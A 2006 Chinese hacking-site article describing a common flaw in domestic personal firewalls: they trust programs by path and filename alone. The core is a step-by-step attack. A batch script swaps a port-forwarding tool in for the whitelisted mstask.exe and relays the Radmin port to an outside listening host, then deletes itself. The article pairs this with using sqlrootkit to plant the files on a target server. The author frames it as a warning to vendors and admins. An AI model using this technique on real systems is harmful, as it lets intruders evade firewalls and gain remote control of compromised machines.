通行证: 用户 密码 域名空间  下载中心 社区论坛 信息公告 my小屋
联系我们
设为首页
加入收藏

 

qq,asp,php,jsp,xml,sql,.net,编程 程序 网页图象 建站经验 私服
首页 | 新闻资讯 | 编程开发 | 网页设计 | 图形图象 | 网络媒体 | 网站模板 | 数 据 库 | 投稿
论坛 | 操作系统 | 系统优化 | 网络安全 | 黑客技术 | 硬件学堂 | 硬件报价 | 服 务 器 | 地图
专题 | 应用软件 | 聊天通讯 | q q 专栏 | 建站经验 | 在线工具 | 站长club | 注 册 表 | 旧版
社会 | 游戏娱乐 | 设计欣赏 | 疑难解答 | 社区论坛 | 韩国素材 | 素材图库 | 广告服务 | 服务
当前位置:首页>>网络安全>>黑客技术>>正文 新版上线![旧版]
注:打开慢时请稍等

找出通病 通杀国内软件防火墙

http://www.iyit.net  日期:2006-6-6 9:03:42  来源:  点击:
参加讨论】一直以来都有一个梦想:要是能发现些漏洞或bug什么的该多好啊!于是整天对着电脑瞎弄瞎研究,研究什么呢?研究如何突破防火墙(偶这里指的防火墙是软体型的个人防火墙,硬件的偶也没条件。)嘿嘿,你还别说,还真没白研究,还真给偶发现了大多数防火墙的通病。这个bug能让我们欺骗防火墙来达到访外的目的,具体情况是怎么样的呢?请看下面的解说!

  首先,我要介绍一下windows系统特性,当一个程序运行时,它不能删除,但却能够改名!而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原!我再讲讲防火墙,大家都知道许多防火墙的“应用程序规则”里一般默认就会让ie浏览器(iexplore.exe)、outlook express(msimn.exe)、lsass.exe、spoolsv.exe、mstask.exe、winlogon.exe、services.exe、svchost.exe通过,而大多的防火墙认为只要是与规则里的路径及文件名相同就pass!以这样的检测方法来决定是否放行,但它却完全没考虑到如果是别的文件替换的呢?——就相当于古装片里的易容术,易容后就认不得了!这就给了我们机会,我们可以利用这个bug来欺骗防火墙来达到访外的目的!

  小知识:其实现在大多木马采用的dll插线程技术也就是利用了这个原理,它们首先隐蔽的开启一个认证放行的程序进程(如iexplore.exe进程),接着把dll型木马插入这个线程内,然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。

  原理讲完了,我们现在讲讲该如何利用这个bug了!这里我用虚拟机做实验,制造如下条件:

  为了更符合现实,我给服务器安装了“天网防火墙”、radmin(但由于防火墙指定了访问ip地址,所以没办法正常连接!),mssql server、serv-u。首先我们用常用的方法进行端口转发,看看防火墙有什么反应!

  第一步,启用angelshell ver 1.0里的fport(用来进行端口转发的服务端,几乎可以转发任何端口),然后在本地用fportclient(用来进行端口转发的客户端)监听好!

  第二步,直接在cmdshell里运行“e:\www\fport.exe 4899 192.168.1.1 7788”,这时我们看到虚拟机里的“天网”对fport马上进行了拦截。

  看到了吧!由于fport并不是认证放行的,防火墙马上就进行了拦截!ok,现在我们实行欺骗计划,看偶如何突破防火墙的!还是执行第一步,然后新建一个批处理,内容如下:

  ren mstask.exe mstask1.exe

  ren fport.exe mstask.exe

  mstask.exe 4899 192.168.1.1 7788

  del %0

  命名为go.bat,接着用sqlrootkit把“fport.exe”和go.bat 一起copy到目标机子的c:\winnt\system32\(也就是mstask所在的目录)在sqlrootkit里执行go.bat(注意如果要改mstask.exe的名的话就需要有管理员权限)。

  当fportclient出现“已经接受到远程计算机的连接!”时,用radmin客户端连接本机的4899端口。

  我们已经成功突破限制(由于防火墙没有限制本地连接4899端口,我们用fport转发了它的端口,登录时等于本地连接,因此我们能够成功连接),这样一来,我们本不能逃过防火墙的fport便变成了一个有“插线程”技术的端口转发工具了!

  据我实验,国内的防火墙几乎无一例外的“拥有”这个bug!虽然这个bug不会带来什么大的危害,但总是给入侵者多了一个黑我们的机会!

  wtf老大说独乐乐不如众乐乐,所以我还是公布出来了,一是可以让我们国内的防火墙有所改进,二是给网管们提个醒!由于小弟技术有限,难免会出现错误,欢迎各位指正批评。


编辑:黑鹰 [发送给好友] [打印本页] [关闭窗口] [返回顶部]
上一篇:黑客技术新动向:“缓存溢出”出现新变形
下一篇:没有了
转载请注明来源:www.iyit.net
特别声明: 本站除部分特别声明禁止转载的专稿外的其他文章可以自由转载,但请务必注明出处和原始作者。文章版权归文章原始作者所有。对于被本站转载文章的个人和网站,我们表示深深的谢意。如果本站转载的文章有版权问题请联系编辑人员,我们尽快予以更正。

 相关文章
校园安全保镖:校园防火墙选择指南 安全攻略:防火墙的高级检测技术ids windows vista系统防火墙初探
使用 java 连接处于proxy(or 防火墙)之 linux的防火墙配置! linux防火墙配置基础篇
linux 防火墙配置基础篇 让关闭的linux操作系统实现防火墙 linux 防火墙配置基础篇
使用ado连接到防火墙后的sql server 都是防火墙惹的祸--oracle连接老断 定位对手 巧用天网防火墙查对方ip地址
网络防火墙与防范溢出策略 windows server 2003 防火墙 利用ip地址欺骗突破防火墙(2)
利用ip地址欺骗突破防火墙(1) 防火墙封阻应用攻击的八项技术(2) 防火墙封阻应用攻击的八项技术(1)
网络安全讲座之三:防火墙技术(6) 网络安全讲座之三:防火墙技术(5) 网络安全讲座之三:防火墙技术(4)
网络安全讲座之三:防火墙技术(3) 网络安全讲座之三:防火墙技术(2) 网络安全讲座之三:防火墙技术(1)
最新更新 热点排行 推荐新闻
找出通病 通杀国内软件防火墙
黑客技术新动向:“缓存溢出”出现新变
用修改文件时间的方法来加密文件
反nids技术应用介绍
实例讲解:全程追踪入侵jsp网站服务器
oracle碎片整理(1)
oracle碎片整理(2)
oracle如何精确计算row的大小
oracle监控数据库性能的sql汇总
oracle logminer使用方法总结
某外企sql server面试题
同步两个sqlserver数据库
sql server:错误18483
sql2005其中三个版本的比较
远程连接sql server 2000服务器的解决
电子政务的“安全观”
利用注册表管理ip地址 
qq病毒查杀实战
伪造qq挂机平台盗密码
如何保护自己的qq号码不被人盗用
qq最新版下载 2006 beta2 体验新感受 
qq密码破解程序
windows xp专业版iis连接数的更改
qq密码本地破解
office2007简体中文版浮出水面 美图抢
visual basic 概述
解决暴风影音无法渲染此文件的难题
解决windows中的explorer.exe出错
exeplorer.exe错误的问题的总结、解决
一个好汉n个帮 word实用插件集锦
巧用acdsee 8.0截取qq表情每一帧
解除瑞星 诺顿遗留下的杀毒兼容问题
第一款开源ajax安全扫描工具sprajax
winrar人性化功能揭密
在asp.net中防止注入攻击
用asp.net开发web服务的五则技巧
linux操作系统12则经典应用技巧
浅谈linux优化及安全配置的个人体会
解决局域网不能互相访问之全攻略
win 2000简单的入侵常识
 友情链接
设置首 页 - 版权声明 - 广告服务 - 关于我们 - 联系我们 - 友情连接
copyrights © 2004-2006 iyit.net all rights reserved.
网站合作、广告联系qq:147007642、466949678
易特网络技术 点击这里给我发消息